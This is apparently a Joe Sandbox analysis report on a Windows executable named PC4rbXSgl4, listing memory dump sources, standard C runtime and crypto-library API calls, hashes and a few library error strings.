                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$Concurrency::cancel_current_task
                • String ID:
                • API String ID: 1247048853-0
                • Opcode ID: bd6835814f7d1d8a476ffc4a2d20dbb89747589f1d814f85c5d4c5ec94c222ac
                • Instruction ID: 93e406d961dd11cfd5081839655f954d064a1aad90143e0ac2c7ea932440ffcb
                • Opcode Fuzzy Hash: bd6835814f7d1d8a476ffc4a2d20dbb89747589f1d814f85c5d4c5ec94c222ac
                • Instruction Fuzzy Hash: 0721F822B5AB4296EB24AB56E6403B92551AF167E4F180730DF7D877D2FF3CA4829340
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _errno_invalid_parameter_noinfomemmovememset
                • String ID:
                • API String ID: 524079128-0
                • Opcode ID: 4093489d835ad6f4dcbe58c9cfa73e7c5576f63fbcb1203a584e96d48c076662
                • Instruction ID: 332b5601516928f469caffe777c0ec7cfb3465cf63a2e3f275e92bd769f9226d
                • Opcode Fuzzy Hash: 4093489d835ad6f4dcbe58c9cfa73e7c5576f63fbcb1203a584e96d48c076662
                • Instruction Fuzzy Hash: A421A2B2A29B8192EB54CB56E65026977A1FB447D0F084231DA7D83BD5EF3CE490C340
                APIs
                Strings
                • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 00007FF6F18B04D6
                • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 00007FF6F18B04A3
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ExceptionThrow
                • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                • API String ID: 432778473-3345525433
                • Opcode ID: 4b40a2191e89895b5de2248b967cd20d0c67ef47f308884eb54668ffa79655a9
                • Instruction ID: 60b74315a4bb56496a418dbc299202c86a08e851f0ecc82ca403d05129efccc4
                • Opcode Fuzzy Hash: 4b40a2191e89895b5de2248b967cd20d0c67ef47f308884eb54668ffa79655a9
                • Instruction Fuzzy Hash: 13217C61A3864792EF60EB64E6913B92361BF853C4F401131EABCC76E6FF1EE5498700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: __std_type_info_compare_errno_invalid_parameter_noinfomemmovememset
                • String ID:
                • API String ID: 3858425197-0
                • Opcode ID: de63e06b3c558558498d2a57f69aa2aa680b5b87d89ff4b422b68e761c19e5b0
                • Instruction ID: 5a2c7f2daa875647ce45040676344c806953b7ec356220ceb8ae8cb44400ded8
                • Opcode Fuzzy Hash: de63e06b3c558558498d2a57f69aa2aa680b5b87d89ff4b422b68e761c19e5b0
                • Instruction Fuzzy Hash: 3021A065A18B8292EB189F66E6400AD7761FB05BD4B084235EF7D877DAEF3CE590C340
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _errno_invalid_parameter_noinfomemmovememset
                • String ID:
                • API String ID: 524079128-0
                • Opcode ID: 5d89e56dd7a9633b4f058f30f7bcb687f8c765e34327d66b4925b4314e48bb9d
                • Instruction ID: fbbf2d126444b441abc7f203278874e4f2e8a686bd4e36f952d8dca45738eb45
                • Opcode Fuzzy Hash: 5d89e56dd7a9633b4f058f30f7bcb687f8c765e34327d66b4925b4314e48bb9d
                • Instruction Fuzzy Hash: 832192B6A15B4197DB549F99E5801AC37A1FB08BC0B145432EA7C837D5EF3CE4A1C740
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ByteCharErrorLastMultiWide
                • String ID:
                • API String ID: 203985260-0
                • Opcode ID: 6361c0deab0d11ff38389974125d8980fadd2f04700b18f350195da18e37cac5
                • Instruction ID: cbe42f14d1b66e4146791a931cb0f05738bef6edde0b2f8158bc2906c19a7c14
                • Opcode Fuzzy Hash: 6361c0deab0d11ff38389974125d8980fadd2f04700b18f350195da18e37cac5
                • Instruction Fuzzy Hash: F1214F72B28B8287E7109F11E54432EBAB4FB99BD4F144235DB9993B94DF3CD8418B40
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove
                • String ID:
                • API String ID: 2162964266-0
                • Opcode ID: 5418c756e105cab108bdd91475a010b3ccecc66168e3954184b4f5a9411d25d3
                • Instruction ID: 30d0aced960f1b95f5cfd4b2f89bb027ff35dc7331f1f3748ae527fb3fd6be3b
                • Opcode Fuzzy Hash: 5418c756e105cab108bdd91475a010b3ccecc66168e3954184b4f5a9411d25d3
                • Instruction Fuzzy Hash: 27111C62B19B4192EF58DB9AF68016862A1FB48FC0B589435DE7D87785EF3CD4E18340
                APIs
                • memmove.VCRUNTIME140(?,?,00000000,00007FF6F18B2EFD), ref: 00007FF6F18B277A
                • memset.VCRUNTIME140(?,?,00000000,00007FF6F18B2EFD), ref: 00007FF6F18B2790
                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF6F18B2EFD), ref: 00007FF6F18B2795
                • _invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF6F18B2EFD), ref: 00007FF6F18B27A1
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _errno_invalid_parameter_noinfomemmovememset
                • String ID:
                • API String ID: 524079128-0
                • Opcode ID: a2f1b08447b5a0148fa46febc7046c01e4a06c772403365860e02d9507873f2a
                • Instruction ID: 8e6b9dd45df90184bd4a7fb750e812c1dd3136a415969de9f56bd00cd0da4f6b
                • Opcode Fuzzy Hash: a2f1b08447b5a0148fa46febc7046c01e4a06c772403365860e02d9507873f2a
                • Instruction Fuzzy Hash: 98115E62A14B8682EB14DB9AA5543BC2792EB4AFC4F4C0039CE2D87381EF3DE4D1C354
                APIs
                • memmove.VCRUNTIME140(?,?,00000000,00007FF6F18B2F0A), ref: 00007FF6F18B26DA
                • memset.VCRUNTIME140(?,?,00000000,00007FF6F18B2F0A), ref: 00007FF6F18B26ED
                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF6F18B2F0A), ref: 00007FF6F18B26F2
                • _invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF6F18B2F0A), ref: 00007FF6F18B26FE
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _errno_invalid_parameter_noinfomemmovememset
                • String ID:
                • API String ID: 524079128-0
                • Opcode ID: c22bd0e5ba5d9bd90f9bbbbdf9725982b08975570ef5e3106926a7ac2fae696b
                • Instruction ID: dfe3e5e869f5c5f7f23dfd133c0ae5f60e4c280a93c03e66b2924b5f6e5668ae
                • Opcode Fuzzy Hash: c22bd0e5ba5d9bd90f9bbbbdf9725982b08975570ef5e3106926a7ac2fae696b
                • Instruction Fuzzy Hash: A8015EA6A1578582EB14DB9995443AD2792FF09BC4F5C0038CE3C8B391EF3DA4E6D314
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _errno_invalid_parameter_noinfomemmovememset
                • String ID:
                • API String ID: 524079128-0
                • Opcode ID: 4082a79a22abe8940f2d988e9841aec826675b5ae0378d37a3722b949097939e
                • Instruction ID: 79fc998bbbe1842c1251d2cd01c758a2e96dc73848d509862d4dafce448961a0
                • Opcode Fuzzy Hash: 4082a79a22abe8940f2d988e9841aec826675b5ae0378d37a3722b949097939e
                • Instruction Fuzzy Hash: F8018EE2A1470582EB258F99994436826A1FB49BD4F181138CE2C5B3D1EF3CE4E28710
                APIs
                • _aligned_malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A109D), ref: 00007FF6F18B89D2
                • ?set_new_handler@std@@YAP6AXXZP6AXXZ@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A109D), ref: 00007FF6F18B89F2
                • _aligned_malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A109D), ref: 00007FF6F18B8A01
                • _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A109D), ref: 00007FF6F18B8A2D
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _aligned_malloc$?set_new_handler@std@@ExceptionThrow
                • String ID:
                • API String ID: 3809495272-0
                • Opcode ID: d6d8ec99ed71804cc5e165d071c3a62ee25e79da49a870176cd981dc3c9e7104
                • Instruction ID: cd654924345ee5ce47a7dace3fba7aaa8db95693adf352cde27cd88cb705f7e6
                • Opcode Fuzzy Hash: d6d8ec99ed71804cc5e165d071c3a62ee25e79da49a870176cd981dc3c9e7104
                • Instruction Fuzzy Hash: 05F0A921B2974382EF20A711E2402BA6362AF867C4F484439D67E877D6FF3CE840C301
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: Cpp_error@std@@Throw_$Cnd_waitMtx_lockMtx_unlock
                • String ID:
                • API String ID: 2823240549-0
                • Opcode ID: ee6b3d65f262b41cf65fae1c60849f45d84e25cf3d9c5279c7e74acb2dc0baf7
                • Instruction ID: 75b90b0ab40aef3ffdedbf84c183e0970c9c7d7a2fc4c012ddcc83458fe1bd23
                • Opcode Fuzzy Hash: ee6b3d65f262b41cf65fae1c60849f45d84e25cf3d9c5279c7e74acb2dc0baf7
                • Instruction Fuzzy Hash: FE018071A2860692EB64CB61D28033927A6FF90BD4F184135D63E839D8EF3CD454C700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _errno_invalid_parameter_noinfofreememmovememset
                • String ID:
                • API String ID: 3846007628-0
                • Opcode ID: 965b0cea40db2dd5484ae41bae128ca2fe7beb19a023e5403b8821f68df85f68
                • Instruction ID: 578d2dd1b74a8e6b07ac2dbe6e57e4df7d31cbb5341faf5373a0b3ab7ec782fa
                • Opcode Fuzzy Hash: 965b0cea40db2dd5484ae41bae128ca2fe7beb19a023e5403b8821f68df85f68
                • Instruction Fuzzy Hash: 3C018F65E28BC181EB24DB6697550697721AF44FE0F588331EE3D83BC9EF2CD4428600
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ErrorFileHandleInformationLast
                • String ID:
                • API String ID: 275135790-0
                • Opcode ID: f7a71d2a070d1eb89dc48099325a41ab15c997c9ff49bf58622e46bb54924863
                • Instruction ID: 63beaf9812d6f8fc82cdb337b7f6091ca045655eec6be69e5c651c2a58889d71
                • Opcode Fuzzy Hash: f7a71d2a070d1eb89dc48099325a41ab15c997c9ff49bf58622e46bb54924863
                • Instruction Fuzzy Hash: C0F0D631B2828292F7646B71D5946B53B92AF017D0F040335C93BC26D4FF6CF9888280
                APIs
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C6E9A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturn
                • String ID: F$IteratedHashBase: input data exceeds maximum allowed by hash function
                • API String ID: 3668304517-3216730400
                • Opcode ID: 44828b26478d83eba3a3456edfcb2b944f431d1cab852ab19c7cb65d8aa908aa
                • Instruction ID: 2128c59f6654eac899c69d06a44e9ee4ff5aecd51dae13d0b07a3a2c6d6c3580
                • Opcode Fuzzy Hash: 44828b26478d83eba3a3456edfcb2b944f431d1cab852ab19c7cb65d8aa908aa
                • Instruction Fuzzy Hash: 33315372A28B4581DB149B55F5803697760FB88BE4F608236E6BD837E5EF3CD494C700
                APIs
                  • Part of subcall function 00007FF6F18A1620: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A16D1
                • __std_exception_copy.VCRUNTIME140 ref: 00007FF6F18A251A
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A255E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                • String ID: Unknown exception
                • API String ID: 1944019136-410509341
                • Opcode ID: da4a1329aade7958d814fdce164dd18ac8d2dc850fe1f7a00ef9e6bcdb6ada32
                • Instruction ID: 20e978c8eec3a751f12c195b01c48a7bb272bfcfe789931517a62608605dd2a5
                • Opcode Fuzzy Hash: da4a1329aade7958d814fdce164dd18ac8d2dc850fe1f7a00ef9e6bcdb6ada32
                • Instruction Fuzzy Hash: F0419322E28B8582EB108F28E5503A973A1FB55B98F109335DABC426E5FF3CD5D5C740
                APIs
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B3B6A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturn
                • String ID: 6$: Nonblocking input is not implemented by this object.
                • API String ID: 3668304517-4211927919
                • Opcode ID: ce84c0e685760eca1138f9466f7fc6cbe752b6f07a4d490f8ea52aa92f9a8333
                • Instruction ID: 9329a96edf4d0d5625192f6d42b1dde1a35e4a71db9dc9e43f78a850b7473e34
                • Opcode Fuzzy Hash: ce84c0e685760eca1138f9466f7fc6cbe752b6f07a4d490f8ea52aa92f9a8333
                • Instruction Fuzzy Hash: 7C216F62A28B4691DB10DB60E55036977A1FB897E4F504236EABC837E9EF3CE194C700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ExceptionThrow
                • String ID:
                • API String ID: 432778473-0
                • Opcode ID: e6b7ef13a2f3db01a5f327f9bdac6633a327a4a150576746589c4444313add46
                • Instruction ID: 9f93a3d4b263459f20c5d147630eda2ed223eebfbe4a87653137e8b75dc81137
                • Opcode Fuzzy Hash: e6b7ef13a2f3db01a5f327f9bdac6633a327a4a150576746589c4444313add46
                • Instruction Fuzzy Hash: 9F510862B28A8581EB60DB25E4553AE7770FB95BC4F805031DBAD87B96EF3CD508CB00
                APIs
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,?), ref: 00007FF6F18C71BC
